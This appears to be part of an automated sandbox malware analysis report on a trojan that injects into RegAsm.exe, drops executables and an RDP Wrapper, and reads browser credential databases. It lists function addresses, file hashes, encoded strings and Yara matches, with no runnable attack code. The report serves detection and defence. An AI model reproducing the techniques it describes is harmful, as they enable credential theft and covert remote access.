Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 11_2_0042DFE0	11_2_0042DFE0
Source: C:\ProgramData\GIJEGDAKEH.exe	Code function: 12_2_00F30C40	12_2_00F30C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203A5030	14_2_203A5030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203F8030	14_2_203F8030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2039B020	14_2_2039B020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203BD020	14_2_203BD020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20387010	14_2_20387010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20343000	14_2_20343000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2040E800	14_2_2040E800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203B2870	14_2_203B2870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20389860	14_2_20389860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203AB040	14_2_203AB040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203F5040	14_2_203F5040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203A2090	14_2_203A2090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2038E0D0	14_2_2038E0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203B1129	14_2_203B1129
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20358120	14_2_20358120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203A0110	14_2_203A0110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20344970	14_2_20344970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203C9950	14_2_203C9950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20385940	14_2_20385940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203C9190	14_2_203C9190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203B69C0	14_2_203B69C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203F9A20	14_2_203F9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20349A10	14_2_20349A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203D4A60	14_2_203D4A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203CE2E0	14_2_203CE2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2039A330	14_2_2039A330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20360350	14_2_20360350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2039DB40	14_2_2039DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203653B0	14_2_203653B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2037B3A0	14_2_2037B3A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20372390	14_2_20372390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20349C20	14_2_20349C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20360C70	14_2_20360C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203AA470	14_2_203AA470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20352450	14_2_20352450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2041CC30	14_2_2041CC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203C4440	14_2_203C4440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203A9490	14_2_203A9490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203A2CF0	14_2_203A2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203F24C0	14_2_203F24C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203C8520	14_2_203C8520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203A0D10	14_2_203A0D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203E7510	14_2_203E7510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203CA590	14_2_203CA590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_204185A0	14_2_204185A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2039E5C0	14_2_2039E5C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2036E630	14_2_2036E630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203AEE20	14_2_203AEE20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20379690	14_2_20379690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203BEE90	14_2_203BEE90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20399770	14_2_20399770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20368760	14_2_20368760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203FF790	14_2_203FF790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2043F8D0	14_2_2043F8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2045D100	14_2_2045D100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20463920	14_2_20463920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_204561E0	14_2_204561E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2043A2C0	14_2_2043A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2044DB30	14_2_2044DB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_204533E0	14_2_204533E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20439430	14_2_20439430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20439CC0	14_2_20439CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2045FD50	14_2_2045FD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_204616D0	14_2_204616D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_204C226A	14_2_204C226A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_204C9390	14_2_204C9390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_204C9A20	14_2_204C9A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_204AAEBE	14_2_204AAEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_204C9F80	14_2_204C9F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_202E4CF0	14_2_202E4CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20307810	14_2_20307810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_202E9000	14_2_202E9000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_202DF160	14_2_202DF160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_202FBAB0	14_2_202FBAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_202DEA80	14_2_202DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20301C50	14_2_20301C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_202FA560	14_2_202FA560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_202DD57C	14_2_202DD57C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2030CE10	14_2_2030CE10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20316E80	14_2_20316E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_202E66C0	14_2_202E66C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20465F40	14_2_20465F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_20484FB2	14_2_20484FB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2046D7C0	14_2_2046D7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2035D030	14_2_2035D030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203B85C0	14_2_203B85C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_2034BE60	14_2_2034BE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 14_2_203A7E90	14_2_203A7E90

Source: Joe Sandbox View	Dropped File: C:\Program Files\RDP Wrapper\rdpwrap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
Source: Joe Sandbox View	Dropped File: C:\ProgramData\BGDGHJEHJJ.exe 63D86693917598DF88D518C057C7680B5BD2DE9ADD384425F81EAD95EEE18DBA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 00410609 appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C54CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C7409D0 appears 121 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0040CC80 appears 44 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C5594D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 0041D1E0 appears 164 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004104E7 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 6C74DAE0 appears 31 times

Source: file.exe

Static PE information: invalid certificate

Source: RDPWInst.exe.15.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: RDPWInst.exe.15.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
Source: RDPWInst.exe.15.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
Source: RDPWInst.exe.15.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
Source: RDPWInst.exe.15.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Source: RDPWInst.exe.15.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: RDPWInst.exe.15.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: RDPWInst.exe.15.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (console) x86-64, for MS Windows

Source: file.exe, 00000000.00000002.2143026132.0000000000B7E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameVQP.exeD vs file.exe

Source: unknown

Driver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BGDGHJEHJJ.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5dbaca34ac_lfdnsafnds[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GIJEGDAKEH.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5db9e54794_vfkagks[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: BKJKEBGDHD.exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 66f5de72d9ebd_rdp[1].exe.3.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: BKJKEBGDHD.exe.3.dr, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 66f5de72d9ebd_rdp[1].exe.3.dr, -Module-.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: BKJKEBGDHD.exe.3.dr, UHJvZ3JhbUFB.cs	Base64 encoded string: 'uzdNq5N5dVHqj8/XOVMujTe+EWhTqjA49W71kkCSuLx6JawXeM2RcAhzIt+RuRyy/UlnVnNcOHA='
Source: BKJKEBGDHD.exe.3.dr, QXNzZW1ibHlMb2FkZXJB.cs	Base64 encoded string: 'ZeT6XRkqE8HZgrZn/7waHKGEjVyd25lJuNP9SMJ0hPuJ3I3/hAJIOxxY+Yg7YHe4CS1O8a8K7Kj294nFj+dJPw=='
Source: BKJKEBGDHD.exe.3.dr, UkRQSW5zdGFsbGVyQUFB.cs	Base64 encoded string: 'qR/7ooPYigp2SEKTzwMFJTSbcua/QmnlHwkHQUoZpYIcQdmz4RMvq3F4MOB9y5qujQpsKpIVip/VlPRARAApHA==', 'qR/7ooPYigp2SEKTzwMFJTSbcua/QmnlHwkHQUoZpYIcQdmz4RMvq3F4MOB9y5qujQpsKpIVip/VlPRARAApHA==', '/mYfODFhO3ApNMwMwQq0ZoqP4TNa2z0qj74asBKv69SU0BkSYbtUwg==', 'kS7gwSttfulL5Db27XY7FIc6M8Csq7eS7wsgJu4D6riP/P9KoTF+B9Ax/EGSjo9KyyiSz0LziPdJ1LhHsTj7FHU1KILz/I8k9rh+X8DEQGTSVUX/deSHDXCkKDQbAN+jTWgp4azI1NM='
Source: 66f5de72d9ebd_rdp[1].exe.3.dr, UHJvZ3JhbUFB.cs	Base64 encoded string: 'uzdNq5N5dVHqj8/XOVMujTe+EWhTqjA49W71kkCSuLx6JawXeM2RcAhzIt+RuRyy/UlnVnNcOHA='
Source: 66f5de72d9ebd_rdp[1].exe.3.dr, QXNzZW1ibHlMb2FkZXJB.cs	Base64 encoded string: 'ZeT6XRkqE8HZgrZn/7waHKGEjVyd25lJuNP9SMJ0hPuJ3I3/hAJIOxxY+Yg7YHe4CS1O8a8K7Kj294nFj+dJPw=='
Source: 66f5de72d9ebd_rdp[1].exe.3.dr, UkRQSW5zdGFsbGVyQUFB.cs	Base64 encoded string: 'qR/7ooPYigp2SEKTzwMFJTSbcua/QmnlHwkHQUoZpYIcQdmz4RMvq3F4MOB9y5qujQpsKpIVip/VlPRARAApHA==', 'qR/7ooPYigp2SEKTzwMFJTSbcua/QmnlHwkHQUoZpYIcQdmz4RMvq3F4MOB9y5qujQpsKpIVip/VlPRARAApHA==', '/mYfODFhO3ApNMwMwQq0ZoqP4TNa2z0qj74asBKv69SU0BkSYbtUwg==', 'kS7gwSttfulL5Db27XY7FIc6M8Csq7eS7wsgJu4D6riP/P9KoTF+B9Ax/EGSjo9KyyiSz0LziPdJ1LhHsTj7FHU1KILz/I8k9rh+X8DEQGTSVUX/deSHDXCkKDQbAN+jTWgp4azI1NM='

Source: classification engine

Classification label: mal100.spre.troj.spyw.evad.winEXE@67/43@16/14

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_6C577030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

3_2_6C577030

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

3_2_004114A5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,

3_2_00411807

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe

File created: C:\Program Files\RDP Wrapper

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

Jump to behavior

Source: C:\ProgramData\BKJKEBGDHD.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6036:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2976:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3492:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2704:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4304:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3636:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4188:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4816:120:WilError_03

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: Yara match	File source: 22.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000016.00000000.2818017493.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2857759824.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: file.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2893376211.0000000020568000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2987077823.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2858662976.000000001A5FC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2893376211.0000000020568000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2987077823.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2858662976.000000001A5FC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2893376211.0000000020568000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2987077823.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2858662976.000000001A5FC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2893376211.0000000020568000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2987077823.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2858662976.000000001A5FC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: RegAsm.exe, 00000003.00000002.2893376211.0000000020568000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2858662976.000000001A5FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: RegAsm.exe, 00000003.00000002.2893376211.0000000020568000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2858662976.000000001A5FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2893376211.0000000020568000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2987077823.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2858662976.000000001A5FC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000003.00000002.2951825363.000000003E7FD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2893376211.0000000020568000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2987077823.000000006C74F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2858662976.000000001A5FC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: RegAsm.exe, 00000003.00000002.2893376211.0000000020568000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2858662976.000000001A5FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: GCGDHJ.3.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, 00000003.00000002.2934684215.0000000032912000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
